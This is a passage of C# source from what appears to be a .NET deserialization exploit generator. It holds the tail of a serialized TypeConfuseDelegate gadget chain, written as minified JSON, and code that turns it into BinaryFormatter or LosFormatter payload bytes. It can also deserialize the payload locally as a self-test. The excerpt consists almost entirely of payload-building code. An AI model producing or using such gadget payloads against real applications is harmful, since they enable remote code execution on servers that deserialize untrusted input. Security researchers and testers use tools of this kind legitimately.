'$type': 'BinaryObjectString', 'objectId': 24, 'value': 'System.String' }},{'Id': 0, 'TypeName': 'ObjectNull', 'Data': { '$type': 'ObjectNull', 'nullCount': 0 }},{'Id': 0, 'TypeName': 'ObjectNull', 'Data': { '$type': 'ObjectNull', 'nullCount': 0 }},{'Id': 39, 'TypeName': 'Int32', 'IsPrimitive': true, 'Data': { '$type': 'MemberPrimitiveUnTyped', 'typeInformation': 8, 'value': 0 }},{'Id': 40, 'TypeName': 'ObjectNull', 'Data': { '$type': 'ObjectNull', 'nullCount': 0 }},{'Id': 41, 'TypeName': 'Object', 'Data': { '$type': 'BinaryObject', 'objectId': 16, 'mapId': 8 }},{'Id': 42, 'TypeName': 'ObjectString', 'Data': { '$type': 'BinaryObjectString', 'objectId': 27, 'value': 'System.Comparison`1[[System.String]]' }},{'Id': 43, 'TypeName': 'MemberReference', 'Data': { '$type': 'MemberReference', 'idRef': 12 }},{'Id': 44, 'TypeName': 'ObjectNull', 'Data': { '$type': 'ObjectNull', 'nullCount': 0 }},{'Id': 45, 'TypeName': 'MemberReference', 'Data': { '$type': 'MemberReference', 'idRef': 12 }},{'Id': 46, 'TypeName': 'MemberReference', 'Data': { '$type': 'MemberReference', 'idRef': 24 }},{'Id': 47, 'TypeName': 'MemberReference', 'Data': { '$type': 'MemberReference', 'idRef': 22 }},{'Id': 49, 'TypeName': 'MessageEnd', 'Data': { '$type': 'MessageEnd' }}]";
        MemoryStream ms_bf = AdvancedBinaryFormatterParser.JsonToStream(tcd_json_minified);
        if (formatter.Equals("binaryformatter", StringComparison.OrdinalIgnoreCase))
        {
            //BinaryFormatter
            if (inputArgs.Test)
            {
                // Local self-test: deserializes the generated stream in this process.
                try
                {
                    ms_bf.Position = 0;
                    SerializersHelper.BinaryFormatter_deserialize(ms_bf);
                }
                catch (Exception err)
                {
                    Debugging.ShowErrors(inputArgs, err);
                }
            }
            return(ms_bf.ToArray());
        }
        else
        {
            // LosFormatter
            MemoryStream ms_lf = SimpleMinifiedObjectLosFormatter.BFStreamToLosFormatterStream(ms_bf);
            if (inputArgs.Test)
            {
                // Local self-test: deserializes the converted stream in this process.
                try
                {
                    // NOTE(review): this rewinds ms_bf, but the call below reads ms_lf,
                    // so the reset has no visible effect on what is deserialized here.
                    ms_bf.Position = 0;
                    SerializersHelper.LosFormatter_deserialize(ms_lf.ToArray());
                }
                catch (Exception err)
                {
                    Debugging.ShowErrors(inputArgs, err);
                }
            }
            return(ms_lf.ToArray());
        }
    }
    else
    {
        // Any other formatter, or minification not requested: serialize the gadget object normally.
        return(Serialize(TypeConfuseDelegateGadget(inputArgs), formatter, inputArgs));
    }
}